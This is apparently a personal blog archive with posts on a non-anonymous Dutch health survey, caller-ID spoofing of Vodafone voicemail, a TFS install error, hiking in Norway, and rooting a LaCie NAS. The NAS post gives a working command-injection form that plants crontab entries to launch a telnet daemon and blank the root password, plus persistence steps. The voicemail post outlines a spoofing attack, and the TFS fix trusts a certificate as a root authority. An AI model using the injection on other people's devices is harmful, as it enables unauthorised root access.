Dutch GGD claims survey to be anonymous, but it’s not

The Dutch healthcare organisation (GGD) is an organisation funded by the Dutch government that is concerned with the health of people in the Netherlands. They want to know about the health of people in the province of Gelderland, so they decided to start a survey.
I agree that statistics, like those from the Dutch statistics bureau, need to come from somewhere, and in this case it is important that they come from a very diverse and relatively large population.

How it works
So how does the GGD do that? Well, first they send you a letter with login data. You can log in on their website (not using SSL!) using a predefined code and you are ready to fill in the survey. And to be certain you didn’t forget, they also send you the survey on paper, so people with no access to or know-how of the Internet can complete the survey as well.

Sensitive information
The questions they ask you are about your birth year, marital status, education, health, alcohol use, smoking, drug use, eating habits, social environment, violence at home and your work. A lot of sensitive information, some of which you probably wouldn’t even voluntarily tell your doctor, unless absolutely necessary.

Anonymity
Of course, you don’t have to be afraid that the data you fill in is connected to you as a person, because they offer to let you conduct the survey anonymously. So, the GGD offers you a way to keep your privacy. They intend to do this by allowing you to rip off the first page of the survey before sending it to them. Well ok, I rip off the first page and my privacy is guaranteed. But then I started wondering what all the bar codes and identification numbers are doing on each of the pages (take a look at the first survey page snapshot below)?

Anonymous or not anonymous, that’s the question
The thing that really scares me about this survey is the fact that they lie to the participants. This is not an anonymous survey, at least not by my definition of “anonymous”.
The GGD even inadvertently proves to you that their survey is not really anonymous. How? They recently sent me a letter asking why I didn’t fill in the survey. Err, wait, I could have submitted it to them anonymously (remember?), so how could they possibly know I didn’t send it to them or fill it in online already? That’s the point. If it was really anonymous, they couldn’t have known whether I sent them the survey!

My opinion
I think the GGD screwed up. Not because their survey is bad, nor because of their intention to conduct it, but solely because they claim that it is anonymous, which it certainly is not! If they ever want to gain my trust again, or even receive sensitive information about me, they should define what they mean by “anonymous” and provide a proper and clear privacy policy. Lying is not a good basis for gaining consumer trust.

References (the letters)

Posted in Privacy

Vodafone voicemail uses caller ID for authentication

This article is about a security risk that I found while using Skype and Vodafone voicemail. I will dive into a specific situation concerning the security of one’s Vodafone voicemail (Netherlands) in combination with Skype‘s ability to spoof the caller ID. Besides that I look at the main concern: trusting a caller ID for authentication purposes.

Vodafone voicemail and Skype

The problem is simple. Vodafone NL offers their customers a voicemail service. If you call the voicemail service from your own mobile phone, you get direct access to the voicemail inbox without needing any form of authorization. It seems the mobile’s caller ID is used for authentication.
Skype, on the other hand, has a ‘feature’ that allows you to assign your own mobile number as the caller ID for Skype-Out calls. This means you can spoof your caller ID, if you authorize it with Skype, for which you only need to respond once to an SMS sent to the device.

So, if I could trick a victim into lending me his or her mobile for only 5 minutes, I could abuse that moment to register the mobile number with a Skype account. This would allow me to access the victim’s Vodafone voicemail, because Skype allows you to spoof the number, and Vodafone authenticates you to a voicemail box based on the caller ID. So, I only need my Skype account to access the victim’s voicemail. An even simpler method could be using a service provider that allows me to spoof a mobile number, like SpoofCard claims to do. You would then only require the victim’s mobile phone number. Scary!

Other services at risk?

So Vodafone voicemail (NL) is vulnerable to this “hack”. But what about other service providers that rely on the caller ID?

For example the ‘ABN AMRO Saldo voor de iPhone‘ [iTunes], a banking application for the Dutch ABN AMRO bank that allows you to see your bank account’s balance (requires a 4-digit PIN).
Or what about the ‘Rabo Bankieren‘ [iTunes] app used for banking with the Dutch Rabobank, which only requires a 5-digit PIN to see your bank account’s balance?
If the caller ID is circumvented as part of the authorization of these applications, the only security layer left is a 4- or 5-digit PIN code, which IMHO is not enough any more.

Of course, the same principle applies to SMS text messages, as described in the article Twitter and Jott Vulnerable to SMS and Caller ID Spoofing by dhanjani.com, but for the sake of simplicity I will not go into that right now.

Questions and conclusion

So what do you think?

  • Do you think this is a security risk or not?
  • Is the caller ID something that is easy to fake?
  • Why is Skype allowed to spoof the caller ID? Is this something anyone can do on any phone network?
  • Should service providers be allowed to trust the caller ID for authentication purposes?
  • Have you seen service providers using the caller ID for authentication purposes?

In my opinion, trusting the caller ID for authentication purposes poses a security risk. Developers should be aware that the caller ID must never be an authentication method by itself, only an addition to another one. Service providers should not use the caller ID alone for authentication!

And remember, if Paris Hilton can hack into a voicemail, anyone can! ;-)
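To make the conclusion concrete, here is an added example (not code from the original post, and not Vodafone’s or Skype’s): a small shell model of a voicemail front-end policy. The weak policy opens a mailbox on the caller ID alone, as the post describes, so a spoofed caller ID is all it takes; the hardened policy uses the caller ID only to select the mailbox, always requires the PIN, and locks the box after a few wrong attempts. The mailbox table, PINs and phone numbers are constructed sample data.

```sh
#!/bin/sh
# Added example (not from the original post, not Vodafone's or Skype's code).
# Models a voicemail front-end: the weak policy trusts the caller ID alone,
# the hardened policy uses it only to pick the mailbox and demands a PIN.
# The mailbox table, PINs and numbers below are constructed sample data.

# Constructed mailbox table, one "<mailbox number> <PIN>" per line.
MAILBOX_DB='31612345678 4821
31687654321 1903'

MAX_FAILURES=3                                   # wrong PINs before a box locks
STATE_DIR=$(mktemp -d "${TMPDIR:-/tmp}/vmstate.XXXXXX")
trap 'rm -rf "$STATE_DIR"' EXIT

# Print the PIN stored for a mailbox number; exit 1 if the box is unknown.
lookup_pin() {
    printf '%s\n' "$MAILBOX_DB" |
        awk -v id="$1" '$1 == id { print $2; found = 1 } END { exit !found }'
}

# Per-mailbox failure counter, kept in a file so it persists between calls.
failures()       { cat "$STATE_DIR/$1" 2>/dev/null || echo 0; }
record_failure() { echo $(( $(failures "$1") + 1 )) > "$STATE_DIR/$1"; }
reset_failures() { rm -f "$STATE_DIR"/*; }

# Weak policy, as the post describes it: presenting the mailbox number as
# caller ID is all it takes, so a spoofed caller ID opens the box.
weak_authorize() {
    lookup_pin "$1" >/dev/null
}

# Hardened policy: the caller ID only selects the mailbox. The PIN is always
# required, and after MAX_FAILURES wrong PINs the box refuses even the right one.
hardened_authorize() {
    caller_id=$1 pin=$2
    stored=$(lookup_pin "$caller_id") || return 1                  # unknown box
    [ "$(failures "$caller_id")" -lt "$MAX_FAILURES" ] || return 1  # locked out
    if [ "$pin" = "$stored" ]; then
        rm -f "$STATE_DIR/$caller_id"            # success resets the counter
        return 0
    fi
    record_failure "$caller_id"
    return 1
}

demo() {
    weak_authorize 31612345678 && echo "weak policy: caller ID alone opened the box"
    hardened_authorize 31612345678 0000 || echo "hardened policy: wrong PIN refused"
    hardened_authorize 31612345678 4821 && echo "hardened policy: correct PIN accepted"
    reset_failures
}
demo
```

The caller ID is still useful as a mailbox selector and as one signal among others; the design point is that it never decides access on its own, and that the PIN check is rate-limited so the 4- or 5-digit space cannot simply be walked.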

Posted in Internet, Privacy

‘cab3.cab has an invalid digital signature’ when installing Team Foundation Server 2010 beta2

I had just started installing Team Foundation Server 2010 beta 2 from an ISO file, using MagicDisc to mount it in my Windows 2007 running in Virtual PC, when I stumbled upon this error:

cab3.cab has an invalid digital signature

You can solve this error by explicitly trusting the certificate that the cab3.cab file was signed with, following these steps:

  1. Look up the file in Explorer
  2. Go to the file’s properties
  3. Go to the tab ‘Digital Signatures’
  4. Click the one item in the list and click ‘Details’
  5. Click ‘View Certificate’ in the opened window
  6. Install the certificate in the ‘Trusted Root Certificate Authorities’ store
  7. Re-run the setup; the cab3 exception should not occur any more

It complained about other cab files as well, but the installer would continue after just clicking ‘Ok’; otherwise you should repeat the steps for the other cab files as well.

Posted in .NET

Hiking in Norway’s Jotunheimen and Hardangervidda

Besseggen

If you like hiking you should definitely go to Norway. I’ve been walking in Jotunheimen and the Hardangervidda with Martin in the last week of August 2009. The environment is truly beautiful and pure, though you should be prepared for the Scandinavian weather, even in summer time.

When hiking in Norway (and probably hiking in general), there is some advice I can give you:

  • Make sure you follow this guide (English and German), provided by the Norwegian Trekking Association (DNT). It includes a nice packing list as well.
  • Good shoes are very important, especially in wet environments with slippery rocks and swamped areas like the Hardangervidda.
  • Be well prepared for both sunny and bad weather (take sun cream and clothes that protect you against cold and rain).
  • Always take a 1:50.000 map of the area. You can buy those in shops and in some of the larger huts in the area. Make sure it is protected against rain as well.
  • A GPS in addition to a map can be useful, especially when it contains Garmin’s topo map of Norway. These topo maps contain most of the trails that are also on the paper map.
  • Be sure to check whether the huts you want to spend the night in are open (especially staffed huts). Some of the huts we visited would close on the first of September.

Jotunheimen (“The home of the giants”)

When you are at Jotunheimen you probably want to visit Besseggen, Norway’s most famous walking trail. We walked from Gjendesheim to Memurubu, but most people first take the boat from Gjendesheim to Memurubu and then walk back from Memurubu to Gjendesheim.

Walking the famous Peer-Gynt trail takes about 6 hours excluding time to rest and relax. Memurubu even has its own weather forecast, so be sure to check that out as well. The following images should give you an idea of the trail:

The route from Gjendesheim to Memurubu, including a height and speed profile, should give you some more information about the route; you can download it below as well:

Elevation Profile
Download as GPX

Hardangervidda

The Hardangervidda is – compared to the Jotunheimen – flatter when it comes to height differences and has more swamped areas. The west side of the Hardangervidda has the most height differences and is also the side we explored a little. It can be reached by car from Øvre Eidfjord (check out the CAR waypoint below). It’s a steep, small road going up a few hundred meters (passing a beautiful waterfall that is not considered that special because it is not on the 1:50000 map), ending at two parking places close to each other and (when you are lucky) some crazy sheep.

We intended to walk to hut Vivelid from our car. When we arrived at hut Vivelid we decided to walk on to hut Hedlo, because the people running hut Vivelid were quite unfriendly (sadly that happens). The people running the private hut Hedlo, on the contrary, were very friendly, with good food, but are also pretty expensive. The walk is certainly doable in a day, though the route avoiding the waterfall Valursfossen, which we took on our way back, is a little quicker.

Check out some pictures:

This is the route from the car to Hedlo, passing the beautiful Valursfossen and then via Vivelid to Hedlo.

Elevation Profile
Download as GPX

‘I see Dutch people, they are everywhere’

Something else we learned is that people from the Netherlands seem to like visiting Norway. On the road from Øvre Eidfjord to the Hardangervidda, where we parked our car at the first parking place, there was room for around eight cars, of which six were taken by people from the Netherlands. Yeah, we have that a lot. :)

Posted in GPS links, Traveling

Get a root shell on a Lacie Network Space device without physically opening the device

About the NAS

LaCie Network Space

I own a 1 TB LaCie Network Space device. This device, also called Network Attached Storage (NAS), lets you hook it onto your (local) network and access files via file and print sharing, FTP and other protocols. Very handy, if it works as you expect it to.
The NAS has an ARM926EJ-S processor, a 1 TB hard disk, 16 MB of memory, a USB port and no fan (which makes it pretty quiet).

Problem

My problem with the NAS is that the kernel running on the device starts killing processes when I copy very large (2 GB+) files to the NAS via file and print sharing (using the Samba server). This broke my device in such a way that it became unusable (no admin panel, though still pingable). Therefore I sent the device for RMA to LaCie’s service desk, where it was repaired.
At least I thought it was, because after copying those large files again, the device broke again, but this time I was luckily still able to reboot and keep the device up a little while before it required a new reboot. :|
The system log showed a kernel that was randomly killing processes. I expect this might be caused by the autoscan feature that indexes the media on the device, or maybe the device just doesn’t have enough memory to cope with the continuous transfer of big files. Not funny for a € 160,- device.

Getting root

I decided I didn’t want to submit the device for RMA again and wanted to get root access to the device and repair it (read: make it more stable) myself. However, I didn’t want to physically open the device and void the warranty. Luckily you don’t have to, at least not when your device is running firmware 1.1.8, as I found out thanks to a post from user ‘hardel09′ (read here). You should only proceed when you understand what you are doing. If you do anything wrong, it can break your device.

Take the following steps:

  1. Save the content below to an HTML page; it allows you to send commands that abuse cron for executing the tasks you want:
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Hack the NAS</title>
    </head>
    <body>
    <form name='edit_form' method='post' action='http://YOURDEVICE/cgi-bin/admin/media'>
    <input type='hidden' id='autoscn' name='autoscn' value='true' />
    <input type='hidden' id='modified' name='modified' value='true' />
    <input name='hour' value='12'/><input name='minute' value='50 12 * * * chmod 755 /home/openshare/utelnetd; /home/openshare/utelnetd &'/>
    <input type=submit value='SET CRONTAB'/>
    </form></body>
    </html>
  2. Change YOURDEVICE in the HTML file to the right IP address or hostname of the NAS
  3. Copy utelnetd to \\YOURDEVICE\openshare\utelnetd
  4. Open the HTML file with your favorite browser, fill the current hour in the hour input field and fill the minute input field with the value below. Change the “HOUR” string to the current hour and change the “MINUTE” string to the next minute plus 2 minutes or so (leaving existing spaces intact), assuming the time on your NAS is correctly set (if not, correct it using the admin panel). Now click the SET CRONTAB button and after a few seconds you should end up at the administrator media page with the autoscan checkbox selected.
    MINUTE HOUR * * * chmod 755 /home/openshare/utelnetd;  /home/openshare/utelnetd &
  5. Now wait a few minutes, start your favorite network scanner tool and check whether port 23 on the NAS has appeared as open. If not, try again from step 4.
  6. If so, you can almost log in, once you set an (empty) password for the root user. Go to the HTML page again, change the “MINUTE” and “HOUR” strings again (leaving existing spaces intact) and add a command that makes root’s password empty:
    MINUTE HOUR * * * passwd -d root
  7. Log in as user root via telnet to get your root shell:

    root shell


  8. If you got a shell, congratulations, you did it! Now continue to make it permanent. Disable the cleanConf daemon, so your changes won’t be reversed when the NAS is rebooted:
    cd /etc/rc.d/rc3.d
    mkdir disabled
    mv S12cleanConf disabled
  9. Fix the hacked crontab by executing the command below and clearing the first line in the editor (which will disable autoscan):
    crontab -e
  10. Copy /home/openshare/utelnetd to /usr/bin and make it executable:
    cp /home/openshare/utelnetd /usr/bin
    chmod 755 /usr/bin/utelnetd
  11. Add a script in /etc/init.d/telnetd for starting utelnetd automatically. Mine looks like this:
    #!/bin/sh
    # Begin $rc_base/init.d/telnetd
     
    . /etc/sysconfig/rc
    . $rc_functions
     
    case "$1" in
            start)
                    echo "Starting telnetd server..."
                    /usr/bin/utelnetd &
                    ;;
     
            stop)
                    echo "Stopping telnetd server..."
     
                    killall utelnetd
                    ;;
            restart)
                    $0 stop
                    sleep 1
                    $0 start
                    ;;
     
            status)
                    statusproc utelnetd
                    ;;
     
            *)
                    echo "Usage: $0 {start|stop|restart|status}"
                    exit 1
                    ;;
    esac
     
    # End $rc_base/init.d/telnetd
  12. Enable the script by making a symbolic link that points to the telnetd script:
    cd /etc/rc.d/rc3.d
    ln -s ../../init.d/telnetd S18telnetd
    cd /etc/rc.d/rc6.d
    ln -s ../../init.d/telnetd K12telnetd
  13. Make the script executable:
    chmod +x /etc/init.d/telnetd

That’s it. You can now reboot the device and utelnetd is automatically started after the reboot.

Now we have root

So what can you do with the device now you have root access to it?

  • Secure it. Anyone in your network who can reach the device via IP can currently connect to it without a password, so you might consider using OpenSSH instead of telnet, as described here. You might want to secure the /www/cgi-bin/admin/media script as well, as it can easily be used to hack into the device.
  • Fix other problems with the software on the NAS that bother you.
  • Mount (multiple) partitions from an external mass-storage device and make it available on the network.
  • Use it as bittorrent client.
  • Run other (light-weighted / self-compiled) applications on it.

I hope this has helped anyone in any way :)

Posted in Hardware, Linux